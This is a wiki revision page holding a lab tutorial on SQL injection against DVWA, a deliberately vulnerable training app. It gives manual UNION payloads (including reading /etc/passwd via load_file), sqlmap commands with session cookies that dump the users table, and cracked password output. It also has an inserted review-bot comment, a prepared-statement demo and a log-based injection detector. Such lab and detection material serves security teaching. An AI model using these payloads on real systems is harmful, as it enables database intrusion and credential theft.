Difference between revisions of "SQLMap: Contoh SQL Injection ke DVWA"

From OnnoWiki
Line 60: Line 60:
  
  
  sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' -cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs
+
  sqlmap -u http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit# \
 +
-cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" -dbs
  
  
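Review bot: the URL on both the old and the new line is unquoted, so an interactive shell treats the `&` in `?id=1&Submit=Submit#` as a background operator and the `#` as the start of a comment, and sqlmap never receives the `Submit` parameter; wrap the URL in single quotes, as the later `sqlmap -u '...'` example on this page does. The option spelling is also off on both lines: sqlmap's long options are `--cookie` and `--dbs` (two dashes), while `-u` is correct as written.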

Revision as of 06:31, 14 November 2014

Source: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Background

Before using SQLMAP it is very helpful to first check whether injection is possible at all. SQLMAP is only a helper tool; we should understand the process manually, since every SQLMAP feature can also be done by hand.


Manual process for testing the vulnerability

Check whether our site is vulnerable:

1' or '2'='2

We need to find out how many columns there are before an error appears.

' and 1=1 union select 1,2 #
' and 1=1 union select 1,2,3 #

This shows that the table has only 2 columns.

Let's do the injection.

' union SELECT 1, user() -- '
' and 1=1 union select database(),version() #
' union SELECT 1, user() #
' and 1=1 union select null,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables #
' and 1=1 union select table_name,table_schema from information_schema.tables where table_schema='dvwa' #
' and 1=1 union select first_name,password from dvwa.users #
' union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' #
' union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'user_id' #
' union select user, password FROM users #
' union SELECT 1, load_file('/etc/hosts') #
' union SELECT 1, load_file('/etc/passwd') #

We know that 1,2,3 gives us an error: the result set has only 2 columns.
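As an added example that is not from the original page, the column-count probe and one UNION payload from above are run against a constructed in-memory SQLite table shaped like DVWA's users table, once through DVWA-style string concatenation and once through a prepared statement, so the reason the three-column probe fails and the reason binding neutralises the same input are both visible. SQLite has no `#` comment, so the payloads use `--` where the page uses `#`; the rows and HASH_PLACEHOLDER values are made up.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (SQLite, in memory); the rows
# and the HASH_PLACEHOLDER values are made up for this example.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', 'HASH_PLACEHOLDER_1');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'HASH_PLACEHOLDER_2');
    """)
    return con

def lookup_vulnerable(con, user_id):
    """DVWA 'low' style: the id is spliced into the SQL text, so a quote and a
    UNION inside the input are parsed as SQL. Returns rows, or the error text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"ERROR: {exc}"

def lookup_safe(con, user_id):
    """Prepared statement: the id is bound as a value and never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()

# The page's column-count probes and one data payload, with SQLite's '--'
# comment in place of MySQL's '#'.
PROBE_2 = "1' and 1=1 union select 1,2 -- "
PROBE_3 = "1' and 1=1 union select 1,2,3 -- "
LEAK = "1' union select first_name, password from users -- "

if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, PROBE_2))  # extra (1, 2) row: two columns fit the query
    print(lookup_vulnerable(con, PROBE_3))  # ERROR: UNION column count does not match
    print(lookup_vulnerable(con, LEAK))     # password column comes back in the last_name slot
    print(lookup_safe(con, PROBE_2))        # []: the whole payload is compared as one id value
    print(lookup_safe(con, "1"))            # [('admin', 'admin')]
```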


Using SQLMAP

Parameters we use and their meaning

-u              the target URL
--cookie        sends / emulates a Cookie header

To obtain the cookie we need to capture it, for example with the Firefox add-on Tamper Data. Example:

Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7

--dbs           lists the databases if the injection succeeds.
-D              selects the database to work on.
--tables        lists the tables of the database given with -D.
--columns       lists the columns of the selected table (-T in the examples below).
--current-user  shows the current user running the SQL session.
--users         lists all users of the SQL server.
--passwords     returns the password hashes from the SQL instance.

Example execution

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' \
  --cookie="security=low; PHPSESSID=7tjk85n07vqlabqf3ij2v858h1" --dbs


sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" --dbs

Returns:

[15:17:52] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa --tables

Returns:

[15:18:19] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa -T users --columns

Returns:

[15:19:14] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

sqlmap -u 'http://192.168.1.90/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7" -D dvwa -T users --dump

--dump dumps the table data. If it contains hashed passwords, SQLMAP (depending on your version) will offer to crack them. You can supply your own dictionary or use the one SQLMAP ships with; in this case the base dictionary cracks all the user passwords.

See the output

[15:21:44] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:21:44] [INFO] starting 4 processes
[15:21:47] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[15:21:50] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[15:21:53] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[15:21:55] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------------------+-----------+------------+
| user_id | user    | password                                    | last_name | first_name |
+---------+---------+---------------------------------------------+-----------+------------+
| 1       | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------------------+-----------+------------+

There you have it: you have just gained access to all the SQL users.
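As an added example, not part of the original page or of sqlmap, a small Python detector that flags the activity walked through above in a web server access log: it matches the page's manual payloads (UNION SELECT, information_schema, load_file, the quote tautology) after URL-decoding the request path, and it flags sqlmap's default User-Agent, which names the tool unless the operator overrides it. The combined log format and the three sample lines are assumed and constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Payload signatures taken from the manual injections on this page; applied to
# the URL-decoded, whitespace-collapsed, lower-cased request path.
PAYLOAD_SIGNATURES = {
    "union-select": re.compile(r"union\s+(all\s+)?select"),
    "information_schema": re.compile(r"information_schema\."),
    "load_file": re.compile(r"load_file\s*\("),
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'"),
}

# Apache/nginx "combined" access log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify(line):
    """Return the reasons a request looks like SQL injection activity
    (empty list for a clean request, None if the line does not parse)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    # sqlmap names itself in its default User-Agent unless the operator overrides it.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    path = re.sub(r"\s+", " ", unquote_plus(m["path"])).lower()
    for name, sig in PAYLOAD_SIGNATURES.items():
        if sig.search(path):
            reasons.append(f"payload:{name}")
    return reasons

# Constructed sample lines: a normal DVWA request, one of the page's manual UNION
# probes URL-encoded by a browser, and a plain request carrying a sqlmap User-Agent.
SAMPLE_LOG = [
    '192.168.1.50 - - [14/Nov/2014:15:17:52 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [14/Nov/2014:15:17:53 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27+and+1%3D1+union+select+table_name%2Ctable_schema+from+information_schema.tables+%23&Submit=Submit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [14/Nov/2014:15:17:54 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4210 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]

def scan(lines):
    """Map each flagged line's index to its reasons; clean lines are omitted."""
    return {i: r for i, r in ((i, classify(l)) for i, l in enumerate(lines)) if r}

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOG).items():
        print(i, reasons)
```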

References